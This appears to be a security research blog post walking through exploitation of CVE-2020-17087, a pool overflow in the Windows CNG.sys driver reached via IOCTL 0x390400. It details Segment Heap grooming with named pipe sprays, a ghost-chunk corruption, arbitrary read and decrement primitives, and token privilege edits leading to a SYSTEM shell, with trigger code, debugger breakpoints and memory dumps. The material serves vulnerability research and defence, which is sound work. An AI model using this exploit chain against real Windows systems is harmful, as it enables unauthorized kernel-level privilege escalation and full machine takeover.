CVE-2020-17087: Exploiting the CNG.sys IOCTL 0x390400 Pool Overflow Vulnerability


CVE-2020-17087 is a pool overflow vulnerability in the Windows CNG.sys driver that was discovered being exploited in the wild [1]. Although root-cause analyses of the vulnerability have been published, its exploitation technique remains relatively unknown. The most notable information is the disclosure by Google Project Zero (GP0) that the ITW sample "uses the buffer overflow to establish an arbitrary read / write primitive in the kernel space with the help of Named Pipe objects" [2].

In this blog post, we describe how this vulnerability could be exploited based on the BlockSize attack method of the Windows 10 Segment Heap [5].

This exploit was developed on Windows 10 20H2, and tested from 1903 to 20H2.

Technical Details

As described in the GP0 issue tracker [1], the root cause lies in the function cng!CfgAdtpFormatPropertyBlock, which converts the input buffer into a space-separated hex representation in Unicode. Each input byte therefore expands to 6 output bytes, so the requested size SrcLen is multiplied by 6 to obtain the output buffer size. However, the size passed to cng!BCryptAlloc is incorrectly truncated to 16 bits. When SrcLen exceeds 0x10000 / 6, the allocated buffer is smaller than required and is subsequently overflowed during the string conversion.
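The size arithmetic is easy to check offline. The following C sketch models it under the assumption stated above (the 6x expansion is computed correctly, but only its low 16 bits reach cng!BCryptAlloc); the helper names are hypothetical and not taken from cng.sys.

```c
#include <assert.h>
#include <stdint.h>

/* Bytes the formatter really writes: every input byte becomes "xx " in
 * UTF-16, i.e. 3 characters = 6 bytes. */
static uint32_t full_output_size(uint32_t src_len)
{
    return src_len * 6;
}

/* Bytes actually requested from cng!BCryptAlloc: only the low 16 bits
 * of the 6x size survive the truncation. */
static uint16_t truncated_alloc_size(uint32_t src_len)
{
    return (uint16_t)(src_len * 6);
}

/* Bytes written past the end of the undersized buffer. */
static uint32_t overflow_bytes(uint32_t src_len)
{
    uint32_t full = full_output_size(src_len);
    uint16_t alloc = truncated_alloc_size(src_len);
    assert(full >= alloc);
    return full - alloc;
}

/* Smallest SrcLen whose 6x expansion no longer fits in 16 bits. */
static uint32_t first_overflowing_len(void)
{
    return (0x10000 + 5) / 6;   /* ceil(0x10000 / 6) */
}
```

For the trigger size 0x2BF9 used later in this post, this gives a 0x7D6-byte allocation but 0x107D6 bytes of output, i.e. exactly 0x10000 bytes past the end of the buffer; the smallest overflowing SrcLen is 0x2AAB.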

Notes on Windows 10 Segment Heap Pool Overflow

Before we start, it is worth highlighting some relevant Segment Heap internals [3][4], exploitation techniques [5][6][7] and our own notes. If you are already familiar with them, feel free to skip to the next section.

Segment Heap front end: NonPagedPoolNx allocations made through nt!ExAllocatePoolWithTag are handled by the internal ntoskrnl function nt!ExAllocateHeapPool, which dispatches to a front-end allocator depending on the requested size: LFH or VS allocation when the request can be satisfied there, and Block Allocation via nt!RtlpHpLargeAlloc for larger blocks. When the front-end allocator runs out of space, a new subsegment is requested from the back-end allocator by calling nt!RtlpHpSegAlloc. The Low Fragmentation Heap (LFH) serves frequently used chunk sizes smaller than 0x200 bytes, which are allocated via RtlpHpLfhContextAllocate from an LFH subsegment. Variable Size (VS) allocation serves chunk sizes in [0x200, 0xFE0], as well as sizes in (0xFE0, 0x20000] that are not page aligned (size & 0xFFF != 0); these are allocated via RtlpHpVsContextAllocateInternal from a VS subsegment.
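As a rough summary of the thresholds above, here is a C sketch that maps a chunk size to the allocator described in this paragraph. It is a simplification: it treats every size below 0x200 as LFH (ignoring that LFH only serves frequently used sizes), and it labels page-aligned sizes in (0xFE0, 0x20000] as ALLOC_OTHER because the paragraph does not cover them. The enum and function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

typedef enum {
    ALLOC_LFH,    /* < 0x200: LFH subsegment                               */
    ALLOC_VS,     /* [0x200, 0xFE0], or (0xFE0, 0x20000] not page aligned  */
    ALLOC_LARGE,  /* > 0x20000: Block Allocation via RtlpHpLargeAlloc      */
    ALLOC_OTHER   /* page-aligned (0xFE0, 0x20000]: not modelled here      */
} allocator_t;

/* Simplified routing by chunk size, following only the thresholds above. */
static allocator_t classify_chunk_size(size_t size)
{
    assert(size > 0);
    if (size < 0x200)
        return ALLOC_LFH;
    if (size <= 0xFE0)
        return ALLOC_VS;
    if (size <= 0x20000)
        return (size & 0xFFF) != 0 ? ALLOC_VS : ALLOC_OTHER;
    return ALLOC_LARGE;
}
```

For instance, the 0x3E0 target chunks, the 0x7F0 hole chunks and the 0xae70-byte group chunks used later all fall in the VS range, which is why the layout is built entirely from VS chunks.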

In general, LFH deals with smaller chunks and caters to frequently used chunk sizes across the entire kernel, which makes it harder to control and groom. Given the constraints of the vulnerability and the available attack methods, we chose the VS allocator for this exploit.

Guard Pages: While experimenting with the pool layout, we encountered inaccessible pages roughly every 0x10 pages. However, the vulnerability requires a "runway" of at least 64KB to complete the overflow, which at first makes exploitation look impossible. As explained in [4], "When VS subsegments, LFH subsegments and large blocks are allocated, a guard page is added at the end of the subsegment / block. For VS and LFH subsegments, the subsegment size should be >= 64KB for a guard page to be added. The guard page prevents a sequential overflow from VS blocks, LFH blocks and large blocks from corrupting adjacent data outside the subsegment (for VS / LFH blocks) or outside the block (for large blocks)". After more careful reading and experimentation, we found that the subsegment size can actually range from 64KB to 256KB, as also noted in [5]. By reversing the relevant ntoskrnl functions, such as nt!RtlpHpSegAlloc and nt!RtlpHpVsSubsegmentCreate, we found that 128KB (0x20000) is the only subsegment size that works for this exploit. For example, by requesting a VS chunk of around 11 pages (0xae70 bytes), we obtain a new subsegment with 23 pages (92KB) of usable space.

Pool Header attacks: The CTF challenges [6][7] are built around planted vulnerabilities with friendlier characteristics, and they turned out not to be close to this particular bug. The two attacks described in the SSTIC paper [5], the PoolType attack (CacheAligned) and the BlockSize attack, are however quite close. Because this bug overwrites memory with the fixed pattern "XX 00 XX 00 20 00", only the BlockSize byte can be controlled, and only to a few limited values: it sits at an even address, while the odd bytes are not controllable:

Breakpoint 0 hit
fffff803`3fd524aa e83549faff      call    cng!BCryptAlloc (fffff803`3fcf6de4)

1: kd> dt nt!_POOL_HEADER rax-10
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00110111 (0x37)		; 0x37 << 4 = 0x370 bytes
   +0x002 PoolType         : 0y00000010 (0x2)		; NonPagedPoolMustSucceed
   +0x000 Ulong1           : 0x2370000
   +0x004 PoolTag          : 0x62676e43			    ; "Cngb"
   +0x008 ProcessBilled    : 0xffff9d88`074b3b49 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x3b49
   +0x00a PoolTagHash      : 0x74b
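To make the header arithmetic explicit, the sketch below splits the first ULONG (Ulong1) and the PoolTag of a 64-bit _POOL_HEADER into the fields shown in the dump. It assumes the x64 layout from the dt output (one byte each for PreviousSize, PoolIndex, BlockSize and PoolType, little-endian) and the PoolQuota bit value 0x8 described later in this post; the type and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define POOL_QUOTA 0x8  /* PoolQuota bit in PoolType, as described in this post */

typedef struct {
    uint8_t previous_size;  /* byte 0 */
    uint8_t pool_index;     /* byte 1 */
    uint8_t block_size;     /* byte 2: chunk size in 16-byte units */
    uint8_t pool_type;      /* byte 3 */
    char    tag[5];         /* PoolTag as a NUL-terminated string */
} pool_header_info;

/* Split Ulong1 and PoolTag of a 64-bit _POOL_HEADER into their fields. */
static pool_header_info decode_pool_header(uint32_t ulong1, uint32_t pool_tag)
{
    pool_header_info h;
    memset(&h, 0, sizeof h);
    h.previous_size = (uint8_t)(ulong1 & 0xFF);
    h.pool_index    = (uint8_t)((ulong1 >> 8) & 0xFF);
    h.block_size    = (uint8_t)((ulong1 >> 16) & 0xFF);
    h.pool_type     = (uint8_t)(ulong1 >> 24);
    for (int i = 0; i < 4; i++)            /* tag characters are stored little-endian */
        h.tag[i] = (char)((pool_tag >> (8 * i)) & 0xFF);
    return h;
}

/* BlockSize counts 16-byte units: 0x37 -> 0x370 bytes, 0x64 -> 0x640 bytes. */
static uint32_t chunk_bytes(uint8_t block_size)
{
    return (uint32_t)block_size << 4;
}
```

Decoding the dump above gives BlockSize 0x37 (0x370 bytes) and tag "Cngb"; the NpFr target chunks shown later decode to BlockSize 0x3E with the PoolQuota bit set.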

Dynamic Lookaside: "Freed chunk of size between 0x200 and 0xF80 bytes can be temporarily stored in a lookaside list in order to provide fast allocation. While they are in the lookaside these chunks won't go through their respective backend free mechanism." The SSTIC paper [5] describes a neat technique for enabling the dynamic lookaside for particular VS chunk sizes, which is a crucial part of both the BlockSize attack and the PoolType attack. In short, the algorithm tweaks the Balance Set Manager and the dynamic lookaside so that the most used chunk sizes since the last rebalance are enabled. This allows reliably freeing and reallocating the same chunk, even when it has a corrupted VS chunk header, because the chunk only goes to the dynamic lookaside temporarily (i.e., it is not actually freed by the backend, which avoids a BSOD). In this exploit, this enables us to: convert the limited pool overflow into a controlled pool overflow using a size-changed "ghost chunk"; search for the corrupted chunk by repeatedly freeing and reallocating chunks from an array; and implement an arbitrary decrement primitive with the Quota Process Pointer Overwrite attack.

Named Pipe spray: For NonPagedPoolNx allocations, Named Pipes are a well-documented way to spray controlled data, and they can also be used to build an arbitrary read primitive. CreatePipe creates a pair of Named Pipe handles for reading and writing, which in turn creates an _NP_CCB and an _NP_FCB object; these are linked to the Named Pipe FileObject referenced from the process handle table, and to the DataQueue object of type _NP_DATA_QUEUE. When data is written to the write handle with WriteFile, an _NP_DATA_QUEUE_ENTRY object is allocated and placed into the DataQueue. The _NP_DATA_QUEUE_ENTRY object consists of a 0x30-byte header followed by the buffered data, which is fully controllable (it is referred to as struct PipeQueueEntry in [3]). The exact mechanism can be understood from the ReactOS npfs source and by reverse engineering the relevant functions in npfs.sys, chiefly NpAddDataQueueEntry, NpRemoveDataQueueEntry, NpPeek and NpInternalRead.

_NP_DATA_QUEUE_ENTRY objects serve two main purposes in this exploit. First, by overwriting both fields _NP_DATA_QUEUE_ENTRY.{QuotaInEntry, DataSize} with larger values, we can read out of bounds using PeekNamedPipe and leak the DataQueue pointer of the next DQE object. Second, by writing the leaked DataQueue pointer into the next block (a valid queue pointer is needed to avoid a BSOD) and changing DataEntryType from 0 (Buffered) to 1 (Unbuffered), we switch the DQE object to Unbuffered mode, which uses the Irp pointer as its data source. By pointing Irp to a fake _IRP structure in user mode, we can reset the AssociatedIrp.SystemBuffer pointer from user mode before each read request, which gives us an arbitrary read primitive.

struct _NP_DATA_QUEUE_ENTRY {		// Let's call this DQE for short
  +0x00  LIST_ENTRY	QueueEntry;
  +0x10  PIRP		Irp;			// Data source in Unbuffered mode, used for the AAR primitive
  +0x18  PSECURITY_CLIENT_CONTEXT	ClientSecurityContext;
  +0x20  ULONG		DataEntryType;	// Buffered 0, Unbuffered 1
  +0x24  ULONG		QuotaInEntry;	// Overwrite for out-of-bounds read
  +0x28  ULONG		DataSize;		// Overwrite for out-of-bounds read
};
struct _NP_DATA_QUEUE {
    LIST_ENTRY Queue;				// points back to _NP_DATA_QUEUE_ENTRY
    ULONG QueueState;				// 1 (WriteEntries)
    ULONG BytesInQueue;
    ULONG EntriesInQueue;
    ULONG QuotaUsed;
    ULONG ByteOffset;
    ULONG Quota;
};
struct _NP_CCB;						// Named Pipe Client Control Block
struct _NP_FCB;						// Named Pipe File Control Block
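For user-mode code that crafts or parses these entries, it helps to pin the documented offsets down at compile time. This is a hypothetical C mirror of the 64-bit DQE header above, with kernel pointers modelled as uint64_t so the layout does not depend on the host; the 4-byte pad at +0x2C is an assumption that matches the 0x30-byte header size (the dumps later in this post show unused bytes there).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
    uint64_t queue_flink;              /* +0x00 QueueEntry.Flink              */
    uint64_t queue_blink;              /* +0x08 QueueEntry.Blink              */
    uint64_t irp;                      /* +0x10 data source when Unbuffered   */
    uint64_t client_security_context;  /* +0x18                               */
    uint32_t data_entry_type;          /* +0x20 0 = Buffered, 1 = Unbuffered  */
    uint32_t quota_in_entry;           /* +0x24                               */
    uint32_t data_size;                /* +0x28                               */
    uint32_t pad;                      /* +0x2C assumed padding to 0x30       */
} dqe_header_t;

enum { DQE_BUFFERED = 0, DQE_UNBUFFERED = 1 };

/* Compile-time checks against the offsets listed in the struct above. */
static_assert(offsetof(dqe_header_t, irp) == 0x10, "Irp at +0x10");
static_assert(offsetof(dqe_header_t, data_entry_type) == 0x20, "DataEntryType at +0x20");
static_assert(offsetof(dqe_header_t, quota_in_entry) == 0x24, "QuotaInEntry at +0x24");
static_assert(offsetof(dqe_header_t, data_size) == 0x28, "DataSize at +0x28");
static_assert(sizeof(dqe_header_t) == 0x30, "buffered data starts at +0x30");
```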

Quota Process Pointer Overwrite: When a chunk has the PoolQuota bit (0x8) set in _POOL_HEADER.PoolType, its ProcessBilled field refers to the _EPROCESS structure of the owning process. Allocating and freeing chunks with quota accounting increments or decrements the counters in the EPROCESS_QUOTA_BLOCK pointed to by _EPROCESS.QuotaBlock. Once we can overwrite the ProcessBilled field, we can build an arbitrary decrement primitive with a crafted QuotaBlock pointer. Note that the data structures may have changed across Windows 10 builds, and this method may have side effects depending on the field values in the process Token. The method requires an arbitrary read to leak the chunk address and the nt!ExpPoolQuotaCookie value, in order to encode an _EPROCESS pointer whose crafted QuotaBlock pointer points near the Token.Privileges field.
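Both the chunk address and the cookie are needed because ProcessBilled is not stored in the clear. The sketch below assumes the XOR encoding described in [5] (ProcessBilled = EPROCESS ^ nt!ExpPoolQuotaCookie ^ chunk address, taking the chunk address to be the address of the _POOL_HEADER); it should be checked against the target build before being relied on. The helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed encoding from [5]: the stored value mixes in a global cookie and
 * the chunk's own address, so it cannot be forged without leaking both. */
static uint64_t encode_process_billed(uint64_t eprocess, uint64_t cookie,
                                      uint64_t pool_header_addr)
{
    return eprocess ^ cookie ^ pool_header_addr;
}

/* XOR is its own inverse, so decoding uses the same two keys. */
static uint64_t decode_process_billed(uint64_t process_billed, uint64_t cookie,
                                      uint64_t pool_header_addr)
{
    return process_billed ^ cookie ^ pool_header_addr;
}
```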

Exploitation Conditions

While exploiting the vulnerability, we noticed some unique conditions that make exploitation different from typical pool overflows:

  1. The overflow has a variable length, in the range [0x10000, 0x5FFFA] bytes.
  2. The overflowed buffer is allocated from NonPagedPoolNx, with a controllable size in [0x2, 0xFFFF] bytes.
  3. The overwritten content follows the format XX 00 XX 00 20 00, with XX in [0x30-0x39, 0x61-0x66] (the ASCII characters '0'-'9' and 'a'-'f').

While (1) and (2) give some flexibility in the range of objects we can overwrite and in the possible layouts, (3) makes exploitation quite challenging, because both the content and the offset of the overwrite become very restrictive. This limits the choice of layout, objects and attack method on the 1903-20H2 Segment Heap.
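Condition (3) follows directly from the output format. The C sketch below, a hypothetical model rather than the cng.sys code, returns the byte written at a given output offset, assuming lowercase hex digits and the "xx " UTF-16 format visible in the memory dumps later in this post. It shows why only offsets 0 and 2 of every 6-byte group depend on the input, which is what restricts BlockSize to a handful of values.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Byte written at offset out_off of the formatted output. Every input byte
 * becomes the UTF-16 string "xx " (6 bytes):
 *   pos 0: high hex digit, pos 2: low hex digit, pos 4: 0x20 (space),
 *   pos 1/3/5: 0x00 (high byte of each UTF-16 character). */
static uint8_t hexdump_byte_at(const uint8_t *in, size_t in_len, size_t out_off)
{
    static const char digits[] = "0123456789abcdef";
    size_t idx = out_off / 6;   /* input byte that produces this offset */
    size_t pos = out_off % 6;   /* position inside its 6-byte group */
    assert(idx < in_len);
    switch (pos) {
    case 0:  return (uint8_t)digits[in[idx] >> 4];
    case 2:  return (uint8_t)digits[in[idx] & 0xF];
    case 4:  return 0x20;
    default: return 0x00;
    }
}

/* Only the two hex-digit positions depend on the input at all. */
static int offset_is_controllable(size_t out_off)
{
    size_t pos = out_off % 6;
    return pos == 0 || pos == 2;
}
```

With the trigger used in step 4 (0x2BF9 input bytes, the last two set to 0xDD, output starting at page offset 0x10), the byte that lands on the BlockSize field at 0x107E2 is 'd' (0x64).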

Exploitation Strategy

The exploitation steps on Windows 10 x64 20H1 are briefly outlined below. We use the following terms: 'g' for groups, the large-chunk pattern of the spray; 'd' for dummy, the helper allocations used to form groups; target chunks are the chunks expected to be overwritten; hole chunks are positioned so that the vulnerable CNG.sys buffer gets allocated into the layout; fill chunks are used to stabilize the hole chunks.

  1. Spray groups: Allocate subsegments of 23 pages such that each subsegment contains a group 3 chunk 'g3' (1 page), a group 1 chunk 'g1' (10 pages), and 12 pages of free space at the end of the subsegment. This is done in the following steps:
     a. Allocate VS subsegments of 23 pages by requesting two 'd1' VS chunks of 11 pages each.
     b. Free each pair of 'd1' chunks to get a free subsegment. Allocate a VS chunk 'd2' (12 pages), which starts at the 2nd page of the subsegment, then allocate a VS chunk 'd3' (10 pages) after 'd2' to occupy the remaining free space.
     c. Free all 'd2' chunks to get holes of 12 pages, and allocate group 1 chunks 'g1' (10 pages).
     d. Free all 'd3' chunks (10 pages) to get 12 pages of free space at the end of each subsegment.
  2. Spray targets: Allocate target VS chunks (BlockSize 0x3E0) to fill the last 12 pages of each subsegment.
  3. Create holes: Free all 'g1' chunks to get 10 contiguous free pages. Allocate hole chunks (BlockSize 0x7F0), which are aligned to the start of each page of the former 'g1' chunk. Allocate fill chunks (BlockSize 0x7B0) to fill the remaining space after each hole chunk on its page. For the last 2/3 of the hole chunks, free one chunk for every 0x10 allocations.
  4. Trigger CNG bug: Trigger the vulnerability via DeviceIoControl with dwIoControlCode = 0x390400 and a requested size of 0x2BF9. An actual allocation of 0x7D6 bytes is made, which is expected to fall into one of the holes created in step 3. The content conversion writes 0x107D6 bytes into the CNG buffer, starting at offset 0x10 of one of the g1 pages: 0x10 full pages plus another 0x7D6 bytes, stopping right before offset 0x7E6 of one of the target pages prepared in steps 1 and 2. This overwrites the _POOL_HEADER.BlockSize field of the 3rd target chunk on that page with 0x64. We refer to this chunk as the ghost chunk, whose size changes from 0x3E0 to 0x640.
  5. Locate ghost chunk: Enable the dynamic lookaside for the ghost chunk size (0x640) and the target chunk size (0x3E0). We can then search backwards for the overwritten target chunk, starting from the last target chunk handle. In each iteration, we free one target chunk and immediately allocate a 0x640 chunk: if the freed chunk is the ghost chunk, the 0x640 allocation returns the exact same address thanks to the lookaside, resulting in a controlled linear pool overflow, which can be detected by calling PeekNamedPipe on the adjacent target chunk handle.
  6. Leak a valid root queue pointer: Once the ghost chunk is found, the QuotaInEntry and DataSize fields of the adjacent target chunk T are overwritten with large values by the linear pool overflow. We can use PeekNamedPipe again to leak a valid root queue pointer.
  7. Arbitrary read primitive: With the leaked root queue pointer, we change the ghost chunk data and trigger the linear pool overflow a second time, overwriting the target chunk T with valid root queue pointers, an IRP pointer crafted in userland, and a DataEntryType changed from Buffered to Unbuffered. By altering the data pointer of the IRP in userland, we can now achieve arbitrary read.
  8. Leak pointers for next step: First, from the previously leaked root queue pointer, we find the base address of NPFS.sys. From npfs_base we locate three variables: nt!ExpPoolQuotaCookie, nt!RtlpHpHeapGlobals and nt!PsInitialSystemProcess. Next, we leak the _EPROCESS pointers of our own process and of winlogon.exe, as well as the address of our own process token.
  9. Preparation for arbitrary decrements: First, leak the VS subsegment address. The arbitrary decrement relies on freeing a chunk with a crafted ProcessBilled pointer, and we need to fix the VS chunk header, because the chunk is not immediately reclaimed and a corrupted VS chunk header would lead to an immediate BSOD. Second, construct 2-3 fake _EPROCESS structures whose QuotaBlock pointers are crafted to point to different byte offsets in Token.Privileges. The LPE version requires two decrements and the DLL version requires three, due to differences in the initial privilege levels.
  10. Perform decrements: For the LPE, two decrements are required, at Token+0x40 and Token+0x48. For the DLL version, three are required: Token+0x4B, Token+0x44, and Token+0x3D. Each decrement is done by invoking the ghost chunk linear pool overflow once: set a new ProcessBilled pointer, fix the original root queue pointer of the target chunk T, and finally free T and quickly reclaim it.
  11. Spawn SYSTEM shell: If step 10 succeeds, bit 20 in Token.Privileges is flipped and SeDebugPrivilege is obtained in both Privileges.Present and Privileges.Enabled. Shellcode can then be injected into winlogon.exe to obtain a SYSTEM shell.
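Step 11 refers to bit 20 of Token.Privileges. As a quick check of that arithmetic, the sketch below computes where the SeDebugPrivilege bit (LUID 20, SE_DEBUG_PRIVILEGE in winnt.h) sits inside the Present and Enabled bitmaps, taking their Token-relative offsets (0x40 and 0x48) from step 10. The helper names are hypothetical; the code only does address arithmetic and never touches a real token.

```c
#include <assert.h>
#include <stdint.h>

#define SE_DEBUG_PRIVILEGE_LUID 20u   /* SE_DEBUG_PRIVILEGE in winnt.h */
#define TOKEN_PRIV_PRESENT 0x40u      /* Token.Privileges.Present (step 10) */
#define TOKEN_PRIV_ENABLED 0x48u      /* Token.Privileges.Enabled (step 10) */

/* Bit mask of a privilege LUID inside a 64-bit privilege bitmap. */
static uint64_t privilege_mask(unsigned luid)
{
    assert(luid < 64);
    return (uint64_t)1 << luid;
}

/* Token-relative byte holding the privilege bit (little-endian bitmap). */
static unsigned privilege_byte(unsigned bitmap_off, unsigned luid)
{
    return bitmap_off + luid / 8;
}

/* Position of the privilege bit inside that byte. */
static unsigned privilege_bit(unsigned luid)
{
    return luid % 8;
}
```

So SeDebugPrivilege corresponds to mask 0x100000, i.e. bit 4 of the bytes at Token+0x42 (Present) and Token+0x4A (Enabled).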
1. Spray groups

Because of the nature of this vulnerability, more than 64KB is written to the CNG output buffer. Due to the properties of the Segment Heap, a VS subsegment is normally no larger than 64KB and is guarded by an inaccessible page before and after it. The idea is to issue a sufficiently large VS request so that a subsegment larger than 64KB is allocated. Additionally, we want the allocations to form two big groups (g2 and g3), with the hole chunks in the first group and the target chunks in the second. Ideally, each of the two groups should span 0x10 pages, so that no matter which hole is occupied by the CNG buffer, the resulting overflow is guaranteed to overwrite one target chunk at the desired offset without running into the guard page.

; Windows 10 20H1 19041.572

.text:00000001C00624A7                 movzx   ecx, di         ; NumberOfBytes
.text:00000001C00624AA                 call    BCryptAlloc     ; truncated
.text:00000001C00624AF                 mov     rdx, rax

bu /p ffff9c833549f080 cng+624AA

PAGE:00000001C000D571                 mov     edx, edx        ; NumberOfBytes
PAGE:00000001C000D573                 mov     ecx, 308h       ; PoolType
PAGE:00000001C000D578                 mov     r8d, 7246704Eh  ; Tag 'NpFr'
PAGE:00000001C000D57E                 call    cs:__imp_ExAllocatePoolWithQuotaTag
PAGE:00000001C000D585                 nop     dword ptr [rax+rax+00h]

bu /p ffff9c833549f080 npfs+D58A ".printf \"[+] Allocated %x bytes DataEntry at %p\\n\",r13, rax; g"

.text:00000001402C7C36                 call    RtlpHpVsSubsegmentCreate
.text:00000001402C7C3B                 mov     rsi, rax

bu /p ffff9c833549f080 nt+2C7C3B ".printf \"[+] RtlpHpVsSubsegmentCreate(req=%x): alloc %p size %x \\n\",r13,rax,poi(rax+20)&0xffff; g"

The idea is to allocate two d1 VS chunks of close to 11 pages each, which results in a new 23-page subsegment; then free the two d1 chunks and request a 12-page d2 chunk and a 10-page d3 chunk. This ensures that d2 is placed at the start of the subsegment.

[+] RtlpHpVsSubsegmentCreate(req=ae70): alloc ffff8d8f57fc5000 size 1ffd
[+] Allocated ae40 bytes DataEntry at ffff8d8f57fc6000
[+] Allocated ae40 bytes DataEntry at ffff8d8f57fd1000
[+] RtlpHpVsSubsegmentCreate(req=be70): alloc ffff8d8f57fc5000 size 1ffd
[+] Allocated be40 bytes DataEntry at ffff8d8f57fc6000
[+] Allocated 9e30 bytes DataEntry at ffff8d8f57fd2000

As far as our analysis goes, we have not yet found a way to create a subsegment larger than 128KB. The relevant code for allocating a subsegment larger than 64KB:

void __fastcall ExAllocateHeapPool(unsigned int PoolType, SIZE_T NumberOfBytes, ULONG Tag, ULONG_PTR BugCheckParameter2, char a5)
{
    // ...
    // RtlpHpLargeAlloc() for larger than 0x20000
    if ( _size > 0x20000 ) {
      JUMPOUT(_size, *(unsigned int *)(v16 + 464), sub_1404675B9);
      v78 = RtlpHpLargeAlloc(v16, _size, _size, v54);
      v56 = v78;
    } else {
      // Use VsContext for <= 0x20000
      a6 = 0;
      v98 = 0i64;
      *(_OWORD *)a5a = 0i64;
      // One of the system 0x20000 allocations goes through here when 0x9070 is requested
      v56 = (__int64)RtlpHpVsContextAllocateInternal(// goes to VsContext allocator!
                       (_HEAP_VS_CONTEXT *)(v16 + 0x280),
      // ...
    }
    // ...
}

The final layout of the 23-page subsegment is as follows:

[guard][g3,1P][------- g1, 10P --------][----- free space of 12P -----][guard]
2. Spray target chunks

This step is to fill the 12 pages of free space after g1 with target chunks.

target_pipes  = prepare_pipe(0x3D0, spray_cnt * 12 * 4 / 10, 'T', 20);

Each of the 12 pages holds 4 target chunks at the same offsets, with their _POOL_HEADERs starting at 0x000, 0x3F0, 0x7E0 and 0xBD0 respectively. We expect the ghost chunk to be at offset 0x7E0 of a page, followed by the target chunk T at 0xBD0, as illustrated below:

ffffd20a`a3f797d0  9e15ce1a de4a7ff9 0000000e ffffd20a  ......J.........
ffffd20a`a3f797e0  0a3e9f00 7246704e 6cbebe8c 0e5b280c  ..>.NpFr...l.([.
ffffd20a`a3f797f0  9092a4b8 ffff870e 9092a4b8 ffff870e  ................
ffffd20a`a3f79800  00000000 00000000 909cfa00 ffff870e  ................
ffffd20a`a3f79810  00000000 000003a0 000003a0 44444444  ............DDDD
ffffd20a`a3f79820  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT

ffffd20a`a3f79bc0  9e15c20a de4a7ff9 0000001e ffffd20a  ......J.........
ffffd20a`a3f79bd0  0a3e9f00 7246704e 6cbeb2bc 0e5b280c  ..>.NpFr...l.([.
ffffd20a`a3f79be0  9092a878 ffff870e 9092a878 ffff870e  x.......x.......
ffffd20a`a3f79bf0  00000000 00000000 909cfdc0 ffff870e  ................
ffffd20a`a3f79c00  00000000 000003a0 000003a0 44444444  ............DDDD
ffffd20a`a3f79c10  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT
3. Create holes

Now we free all the g1 chunks to get 10 contiguous free pages, and allocate hole chunks (0x7F0 bytes). Since a page cannot hold two hole chunks, each hole chunk is expected to be allocated at the start of a free page. After allocating all hole chunks, we allocate fill chunks (0x7B0 bytes) to occupy the free space after each hole chunk. Finally, for the last 2/3 of the subsegments created, we free one hole for every 0x10 allocations, leaving roughly one hole per subsegment.

  hole_pipes = prepare_pipe(0x800 - 0x40, spray_cnt, 'H', 0);	// 0x7f0 chunk
  fill_pipes = prepare_pipe(0x7D0 - 0x40, spray_cnt, 'F', 0);	// 0x7b0 chunk
  close_all_pipe_from_idx(g1_pipes, 0);
  create_holes_from(hole_pipes, spray_cnt / 3);

From this spray layout, we expect each hole chunk to start at the beginning of a page.

4. Trigger the vulnerability in CNG

Now we are ready to trigger the vulnerability and the CNG output buffer is expected to fall into one of the holes just created.

  CONST DWORD DataBufferSize = 0x2BF9;		// overwrites 0x2BF9 * 6 = 0x107D6 bytes, till 0x107E6

  CONST DWORD IoctlSize = 4096 + DataBufferSize;
  BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize);

  RtlZeroMemory(IoctlData, IoctlSize);

  *(DWORD*)    &IoctlData[0x00] = 0x1A2B3C4D;
  *(DWORD*)    &IoctlData[0x04] = 0x10400;
  *(DWORD*)    &IoctlData[0x08] = 1;
  *(ULONGLONG*)&IoctlData[0x10] = 0x100;
  *(DWORD*)    &IoctlData[0x18] = 3;
  *(ULONGLONG*)&IoctlData[0x20] = 0x200;
  *(ULONGLONG*)&IoctlData[0x28] = 0x300;
  *(ULONGLONG*)&IoctlData[0x30] = 0x400;
  *(DWORD*)    &IoctlData[0x38] = 0;
  *(ULONGLONG*)&IoctlData[0x40] = 0x500;
  *(ULONGLONG*)&IoctlData[0x48] = 0x600;
  *(DWORD*)    &IoctlData[0x50] = DataBufferSize; // OVERFLOW
  *(ULONGLONG*)&IoctlData[0x58] = 0x1000;
  *(ULONGLONG*)&IoctlData[0x60] = 0;
  RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12);
  RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12);

  memset(IoctlData + 0x1000 + DataBufferSize - 0x2, '\xdd', 0x2);	// write 0x64 as BS

  ULONG_PTR OutputBuffer = 0;
  DWORD BytesReturned;
  BOOL Status = DeviceIoControl(

After the overwrite, one of the target chunks at the desired offset has 6 bytes overwritten, ending right before offset 0x7E6:

1: kd> gu
fffff803`65351e39 85c0            test    eax,eax
1: kd> dc ffffd20a`a3f797d0
ffffd20a`a3f797d0  00200030 00300030 00640020 00200064  0. .0.0. .d.d. .
ffffd20a`a3f797e0  00640064 72460020 6cbebe8c 0e5b280c  d.d. .Fr...l.([.
ffffd20a`a3f797f0  9092a4b8 ffff870e 9092a4b8 ffff870e  ................
ffffd20a`a3f79800  00000000 00000000 909cfa00 ffff870e  ................
ffffd20a`a3f79810  00000000 000003a0 000003a0 44444444  ............DDDD
ffffd20a`a3f79820  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT
ffffd20a`a3f79830  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT
ffffd20a`a3f79840  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT

The chunk has its BlockSize overwritten from 0x3E to 0x64. The other 5 overwritten bytes around it are either unused or do not matter. We refer to this chunk as the ghost chunk, since its increased size makes it overlap the next target chunk T:

ffffd20a`a3f79bc0  9e15c20a de4a7ff9 0000001e ffffd20a  ......J.........
ffffd20a`a3f79bd0  0a3e9f00 7246704e 6cbeb2bc 0e5b280c  ..>.NpFr...l.([.
ffffd20a`a3f79be0  9092a878 ffff870e 9092a878 ffff870e  x.......x.......
ffffd20a`a3f79bf0  00000000 00000000 909cfdc0 ffff870e  ................
ffffd20a`a3f79c00  00000000 000003a0 000003a0 44444444  ............DDDD
